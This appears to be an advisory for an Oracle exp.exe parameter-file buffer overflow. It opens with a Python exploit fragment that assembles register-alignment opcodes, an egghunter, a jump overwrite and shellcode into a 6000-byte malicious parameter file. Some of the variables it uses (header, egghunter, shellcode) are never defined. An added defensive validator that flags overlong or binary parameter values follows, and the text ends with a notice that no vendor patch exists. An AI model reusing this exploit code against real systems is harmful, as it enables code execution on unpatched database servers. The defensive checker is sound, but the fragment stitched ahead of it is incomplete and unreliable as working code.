Oracle Database "exp.exe" Parameter File Remote Buffer Overflow Vulnerability (2)

# align edx
# MOV EDX,ESP
# SUB EDX,64
# SUB EDX,64
# SUB EDX,64
# SUB EDX,32
# SUB EDX,64           
# JMP EDX
align = ("\x8b\xd4\x83\xea\x64\x83\xea\x64\x83"
"\xea\x64\x83\xea\x32\x83\xea\x64\xff\xe2\x43");

exploit = header
exploit += "\x43" * 39
exploit += align
exploit += egghunter
exploit += "\x41" * (533-len(exploit))
exploit += "\xe9\x2a\xfe\xff\xff"
exploit += "\xbb\x8b\xe2\x61"
exploit += "\xeb\xf5"
exploit += "\x41" * 100
exploit += "\x57\x30\x30\x54" * 2
exploit += sc
exploit += "\x43" * (6000-len(exploit))
exploit += ".dmp"
banner()
print ("[+] Shellcode byte size: %s" % (len(sc)))
print ("[+] Writing %s bytes of exploit code to param file" % (len(exploit)))
pwnfile = open('overflow_oracle_exp.txt','w');
pwnfile.write(exploit);
pwnfile.close()
print "[+] Exploit overflow_oracle_exp.txt file created!"
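
A defensive counterpart to the script above, added here as an example (it is not part of the original advisory or exploit): a pre-flight check that rejects parameter files containing overlong or non-printable values before they are handed to exp.exe. The length limits and the sample inputs are assumptions constructed for illustration.

```python
import re

# Assumed policy limits, not taken from the advisory; tune for your site.
MAX_LINE_LEN = 512     # longest accepted line in a parameter file
MAX_VALUE_LEN = 256    # longest accepted value for a single keyword
KEYWORD_RE = re.compile(rb"[A-Za-z_][A-Za-z0-9_]*\Z")


def check_parfile(data: bytes):
    """Return (line_no, reason) findings for an exp parameter file."""
    findings = []
    for no, raw in enumerate(data.splitlines(), 1):
        if len(raw) > MAX_LINE_LEN:
            findings.append((no, "line longer than %d bytes" % MAX_LINE_LEN))
        # Parameter files are plain text: flag control and non-ASCII bytes.
        if any((b < 0x20 and b != 0x09) or b > 0x7E for b in raw):
            findings.append((no, "non-printable or non-ASCII byte"))
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue  # blank line or comment
        key, sep, value = line.partition(b"=")
        if not sep or not KEYWORD_RE.match(key.strip()):
            findings.append((no, "not a KEYWORD=value line"))
        elif len(value.strip()) > MAX_VALUE_LEN:
            findings.append((no, "value longer than %d bytes" % MAX_VALUE_LEN))
    return findings


# Constructed samples (not real exports and not the file built above).
BENIGN = b"# nightly export\nUSERID=scott\nFILE=expdat.dmp\nLOG=exp.log\n"
OVERLONG = b"FILE=" + b"A" * 6000 + b".dmp\n"
BINARY = b"FILE=\x90\x00backup.dmp\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overlong", OVERLONG),
                         ("binary", BINARY)):
        print(name, check_parfile(sample) or "ok")
```

Run the check wherever parameter files arrive from outside the DBA's control, and refuse to invoke exp.exe on any file that returns findings.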

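Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Oracle
------
The vendor has not yet released a patch or upgrade. Users of this software should watch the vendor's home page for the latest version: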
